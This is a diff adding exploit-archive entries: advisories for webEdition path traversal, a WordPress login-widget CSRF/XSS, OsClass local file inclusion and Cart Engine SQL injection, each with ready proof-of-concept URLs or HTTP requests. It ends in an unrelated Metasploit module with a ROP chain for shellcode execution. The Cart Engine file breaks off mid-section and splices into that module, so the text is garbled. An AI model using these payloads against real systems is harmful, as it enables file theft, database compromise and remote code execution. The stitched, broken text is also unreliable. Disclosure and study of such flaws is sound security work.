+Vulnerability Type: Path Traversal [CWE-22]
+CVE Reference: CVE-2014-5258
+Risk Level: Medium
+CVSSv2 Base Score: 4 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered vulnerability in webEdition, which can be exploited to read arbitrary files on the target system.
+
+
+1) Path Traversal in webEdition: CVE-2014-5258
+
+The vulnerability exists due to insufficient sanitization of the "file" HTTP GET parameter in "/webEdition/showTempFile.php" script. A remote authenticated user can send a specially crafted HTTP GET request containing directory traversal sequences (e.g. "../") and read contents of arbitrary files on the target system with privileges of the web server.
+
+The exploitation example below display contents of "/etc/passwd" file:
+
+http://[host]/webEdition/showTempFile.php?file=../../../../etc/passwd
+
+Successful exploitation of the vulnerability requires valid user credentials. Registration is not open by default and all user accounts are created by the administrator of the web application. 
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to webEdition 6.3.9 Beta
+
+More Information:
+http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23227 - https://www.htbridge.com/advisory/HTB23227 - Path Traversal in webEdition.
+[2] webEdition - http://www.webedition.org - is a Content Management System.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
\ No newline at end of file
diff --git a/platforms/php/webapps/34762.txt b/platforms/php/webapps/34762.txt
new file mode 100755
index 000000000..13222abe2
--- /dev/null
+++ b/platforms/php/webapps/34762.txt
@@ -0,0 +1,52 @@
+Details
+================
+Software: Login Widget With Shortcode
+Version: 3.1.1
+Homepage: http://wordpress.org/plugins/login-sidebar-widget/
+Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerablity-in-login-widget-with-shortcode-allows-unauthenticated-attackers-to-do-anything-an-admin-can-do/
+CVE: Awaiting assignment
+CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
+
+Description
+================
+CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do
+
+Vulnerability
+================
+This plugin is vulnerable to a combination CSRF/XSS attack. An attacker able to convince an admin to visit a link of their choosing is able to insert arbitrary HTML into an admin page. Using that ability they can use JavaScript to control an admin user’s browser, allowing the attacker to create user accounts, create posts, delete all posts, etc.
+
+Proof of concept
+================
+If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript).
+
+ alert(1)\"> + + +
+
+Mitigations
+================
+Upgrade to version 3.2.1 or later.
+
+Disclosure policy
+================
+dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
+
+Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
+
+This vulnerability will be published if we do not receive a response to this report with 14 days.
+
+Timeline
+================
+
+2014-08-26: Discovered
+2014-09-15: Reported to vendor by email
+2014-09-15: Vendor reported the issue fixed and a new version released
+2014-09-17: Published
+
+
+
+Discovered by dxw:
+================
+Tom Adams
+Please visit security.dxw.com for more information.
\ No newline at end of file
diff --git a/platforms/php/webapps/34763.txt b/platforms/php/webapps/34763.txt
new file mode 100755
index 000000000..83bc23c8f
--- /dev/null
+++ b/platforms/php/webapps/34763.txt
@@ -0,0 +1,49 @@
+Information
+-----------
+Advisory by Netsparker.
+Name : LFI Vulnerability in OsClass
+Affected Software : OsClass
+Affected Versions: 3.4.1 and possibly below
+Vendor Homepage : http://osclass.org/
+Vulnerability Type : Local File Inclusion
+Severity : Critical
+CVE-ID: CVE-2014-6308
+Netsparker Advisory Reference : NS-14-031
+
+Advisory URL
+------------
+https://www.netsparker.com/lfi-vulnerability-in-osclass/
+
+Description
+-----------
+Local file inclusion vulnerability where discovered in Osclass, an
+open source project that allows you to create a classifieds sites.
+
+Technical Details
+-----------------
+Proof of Concept URL for LFI in OsClass:
+
+http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
+
+Advisory Timeline
+-----------------
+03/09/2014 - First Contact
+03/09/2014 - Vulnerability fixed:
+https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
+15/09/2014 - Fix released publicly in Osclass 3.4.2
+
+Credits & Authors
+-----------------
+These issues have been discovered by Omar Kurt while testing
+Netsparker Web Application Security Scanner.
+
+About Netsparker
+----------------
+Netsparker can find and report security issues and vulnerabilities
+such as SQL Injection and Cross-site Scripting (XSS) in all websites
+and web applications regardless of the platform and the technology
+they are built on. Netsparker's unique detection and exploitation
+techniques allows it to be dead accurate in reporting hence it's the
+first and the only False Positive Free web application security
+scanner. For more information on Netsparker visit
+https://www.netsparker.com.
\ No newline at end of file
diff --git a/platforms/php/webapps/34764.txt b/platforms/php/webapps/34764.txt
new file mode 100755
index 000000000..5af030da5
--- /dev/null
+++ b/platforms/php/webapps/34764.txt
@@ -0,0 +1,249 @@
+=== Details ===
+Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
+Affected Product: Cart Engine
+Version: 3.0
+
+=== Executive Summary ===
+
+SQL Injection: Using a specially crafted HTTP request, it is possible to exploit
+a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters
+of cart.php page. Successful exploitation of the vulnerabilities results in read
+sensitive data from the database and, in some cases, execute administration
+operation on the database or issue commands to the operating system.
+
+Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit
+a lack in the neutralization[2] of multiple pages output which includes the user
+submitted content. Successful exploitation of the vulnerabilities, results in
+the execution of arbitrary HTML and script code in the user’s browser in the context of
+the victim user's session trough a “Reflected XSS”.
+
+Open Redirect: Using a specially crafted HTTP request, it is possible to
+redirect[3] the normal browsing of users to a malicious site by modifying
+untrusted URL input in Referer HTTP header parameter in index.php, cart.php,
+msg.php and page.php pages. Successful exploitation of the vulnerabilities
+results in phishing scam, user credential theft, malware dissemination.
+
+=== Proof of Concept ===
+
+= SQL Injection (based on MySQL) =
+
+A SQL Injection vulnerability has been detected on cart.php page in Cart Engine
+CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id”
+parameter, so error based and boolean-based blind or time-based blind SQL
+Injection attacks can be executed.
+ + +## HTTP REQUEST - injection on item_id[0] parameter ## +POST /cart.php HTTP/1.1 +Host: eshop.hacme.hac +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://eshop.hacme.hac/detail.php?item_id=8 +Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347 +Content-Length: 774 + +-----------------------------109606523931762158449252347 +Content-Disposition: form-data; name="AXSRF_token" + + +-----------------------------109606523931762158449252347 +Content-Disposition: form-data; name="cmd" + +add +-----------------------------109606523931762158449252347 +Content-Disposition: form-data; name="item_id[0]" + +8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql +-----------------------------109606523931762158449252347 +Content-Disposition: form-data; name="qty[0]" + +1 +-----------------------------109606523931762158449252347 +Content-Disposition: form-data; name="qty[0]" + +1 +-----------------------------109606523931762158449252347-- +## EOF HTTP REQUEST ## + +## HTTP REQUEST - injection on item_id[] parameter ## +POST /cart.php HTTP/1.1 +Host: eshop.hacme.hac +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://eshop.hacme.hac/detail.php?item_id=13 +Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13 +Connection: keep-alive +Content-Type: multipart/form-data; 
boundary=---------------------------1948855485207142787318084006 +Content-Length: 2353 + +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="AXSRF_token" + + +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="cmd" + +add +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="item_id[0]" + +13 +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="qty[0]" + +1 +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="qty[0]" + +1 +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="prod_opt_3" + +3 +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="prod_opt_12" + + +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="item_id[]" + + +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="qty[]" + +1 +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="item_id[]" + +' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="qty[]" + +1 +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="item_id[]" + + +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="qty[]" + +1 +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="item_id[]" + + +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="qty[]" + +1 +-----------------------------1948855485207142787318084006 
+Content-Disposition: form-data; name="item_id[]" + + +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="qty[]" + +1 +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="item_id[]" + + +-----------------------------1948855485207142787318084006 +Content-Disposition: form-data; name="qty[]" + +1 +-----------------------------1948855485207142787318084006-- +## EOF HTTP REQUEST ## + += Reflected XSS = + +A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine +CMS. In the file "skins/default/outline.tpl", the parameter "path" in section +"drop down TOP menu (with path)" and the parameter "$print_this_page" in section +"footer_content_block" are not sanitized, so an XSS attack can be executed on +multiple pages. + +## HTTP REQUESTS ## +/index.php?"> + + + EOS + + print_status("Sending #{self.name}") + send_response_html(cli, content, {'Pragma' => 'no-cache'}) + end + + # Uses gadgets from ijl11.dll 1.1.2.16 + def rop_payload(code) + xpl = rand_text_alphanumeric(61) # offset + xpl << [0x60014185].pack("V") # RET + xpl << rand_text_alphanumeric(8) + + # EBX = dwSize (0x40) + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0xffffffff].pack("V") # ecx value + xpl << [0x6002157e].pack("V") # POP EAX # RETN + xpl << [0x9ffdafc9].pack("V") # eax value + xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN + xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 + xpl << [0x60018084].pack("V") # POP EBP # RETN + xpl << rand_text_alphanumeric(4) # padding + xpl << rand_text_alphanumeric(4) # padding + xpl << rand_text_alphanumeric(4) # padding + xpl << rand_text_alphanumeric(4) # padding + xpl << [0x60029f6c].pack("V") # .data ijl11.dll + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN) + xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret 
+ # EDX = flAllocationType (0x1000) + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0xffffffff].pack("V") # ecx value + xpl << [0x6002157e].pack("V") # POP EAX # RETN + xpl << [0x9ffdbf89].pack("V") # eax value + xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN + xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 + # ECX = flProtect (0x40) + xpl << [0x6002157e].pack("V") # POP EAX # RETN + xpl << rand_text_alphanumeric(4) # padding + xpl << rand_text_alphanumeric(4) # padding + xpl << rand_text_alphanumeric(4) # padding + xpl << rand_text_alphanumeric(4) # padding + xpl << [0x60029f6c].pack("V") # .data ijl11.dll + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0xffffffff].pack("V") # ecx value + 0x41.times do + xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN + end + # EAX = ptr to &VirtualAlloc() + xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll] + xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll] + # EBP = POP (skip 4 bytes) + xpl << [0x6002054b].pack("V") # POP EBP # RETN + xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn) + # ESI = ptr to JMP [EAX] + xpl << [0x600181cc].pack("V") # POP ESI # RETN + xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax]) + # EDI = ROP NOP (RETN) + xpl << [0x60021ad1].pack("V") # POP EDI # RETN + xpl << [0x60021ad2].pack("V") # ptr to &(retn) + # ESP = lpAddress (automatic) + # PUSHAD # RETN + xpl << [0x60018399].pack("V") # PUSHAD # RETN + xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn) + xpl << code + + xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string + xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping + + xpl + end + +end \ No newline at end of file